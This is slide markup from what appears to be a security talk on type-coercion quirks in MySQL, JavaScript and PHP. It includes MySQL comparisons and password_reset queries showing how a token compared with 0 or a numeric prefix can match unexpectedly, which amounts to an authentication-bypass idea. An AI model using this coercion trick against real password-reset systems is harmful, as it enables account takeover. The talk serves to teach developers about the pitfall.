                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5ebe2294ecd0e0f08eab7690d2a6ee69</a:t>
            </a:r>
            <a:r>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="586739" indent="-293369" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="C6C4C7"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25146" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>SELECT * FROM password_reset WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="293369" indent="-293369" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25146" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>String equivalence for numeric “portions”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="586739" indent="-293369" defTabSz="385572">
              <a:spcBef>
                <a:spcPts val="2300"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="B8B7B9"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="25146" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>SELECT * FROM password_reset WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3AB</a:t>
            </a:r>
            <a:r>
              <a:t>’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</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WAT MySQL Cheat Sheet"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>WAT MySQL Cheat Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Type coercion in MySQL…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618066" y="2422427"/>
            <a:ext cx="7241845" cy="6774076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="53585F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="000000"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="311150" indent="-311150" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="26669" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Type coercion in MySQL</a:t>
            </a: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t>1=0; false</a:t>
            </a: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t>1!=0; true</a:t>
            </a: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t>1=‘a’; false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="311150" indent="-311150" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="26669" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>0=‘a’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="311150" indent="-311150" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="26669" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>0=‘2foobar’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="311150" indent="-311150" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="26669" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>3=‘3F0A’</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="85D4FF"/>
              </a:solidFill>
            </a:endParaRP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t>1=‘3F0A’; false</a:t>
            </a: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rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’a’=‘A’</a:t>
            </a:r>
            <a:r>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="311150" indent="-311150" defTabSz="408940">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="26669" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>_binary ‘a’ = ‘A’; false</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="wat-horse.gif" descr="wat-horse.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="0"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686555" y="2422427"/>
            <a:ext cx="3801779" cy="677407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Let’s talk about JavaScript"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="1011765"/>
            <a:ext cx="5638800" cy="3505203"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let’s talk about JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Type Corecion in JavaScript makes detecting and filtering JavaScript difficult….…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787399" y="5695751"/>
            <a:ext cx="11430003" cy="2973587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="239522">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="15621" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Type Corecion in JavaScript makes detecting and filtering JavaScript difficult….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="239522">
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="15621" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="239522">
              <a:defRPr b="1" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FF6C6C"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="15621" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https://www.destroyallsoftware.com/talks/wat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="160" name="es6.jpeg"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7001029" y="906970"/>
            <a:ext cx="5428944" cy="4196315"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5428942" cy="4196314"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="158" name="es6.jpeg" descr="es6.jpeg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="190500" y="190500"/>
              <a:ext cx="5047942" cy="3789914"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="159" name="es6.jpeg" descr="es6.jpeg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="5428944" cy="419631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WAT JavaScript Equivalences"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>WAT JavaScript Equivalences</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="[]+[] = Empty String…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793750" y="2768598"/>
            <a:ext cx="5422900" cy="6340545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="53585F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="000000"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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Empty String</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Object</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0</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NaN</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False</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True</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Undefined</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NaN</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1</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2</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Number</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Empty String</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="222250" indent="-222250" defTabSz="292100">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="19050" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>![] = Boolean</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="wat-hair.gif" descr="wat-hair.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="0"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6571261" y="2720750"/>
            <a:ext cx="6288478" cy="43121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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596900" y="552855"/>
            <a:ext cx="11430000" cy="8647890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="53585F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="000000"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="257047">
              <a:defRPr sz="2500">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="25400" dist="16764" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Andale Mono"/>
                <a:ea typeface="Andale Mono"/>
                <a:cs typeface="Andale Mono"/>
                <a:sym typeface="Andale Mono"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>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WAT"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="8331200"/>
            <a:ext cx="11430000" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>WAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="171" name="ice_cube_wtf.jpg"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="400756" y="392398"/>
            <a:ext cx="12203289" cy="8123072"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12203287" cy="8123071"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="169" name="ice_cube_wtf.jpg" descr="ice_cube_wtf.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="190499" y="190500"/>
              <a:ext cx="11822289" cy="7716672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="170" name="ice_cube_wtf.jpg" descr="ice_cube_wtf.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="12203289" cy="812307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Lets talk about PHP"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041400" y="-2019300"/>
            <a:ext cx="10511964" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Lets talk about PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Powers and estimated 60% of the Internet…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787399" y="1642533"/>
            <a:ext cx="12837784" cy="2408239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Powers and estimated 60% of the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>40% of the Internet just on Wordpress alone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="177" name="php.png"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4858830" y="3890226"/>
            <a:ext cx="8048606" cy="5757750"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8048604" cy="5757749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="175" name="php.png" descr="php.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="190500" y="190500"/>
              <a:ext cx="7667605" cy="5351350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="176" name="php.png" descr="php.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="8048605" cy="575775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HP Type Converions"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="25400"/>
            <a:ext cx="11430000" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
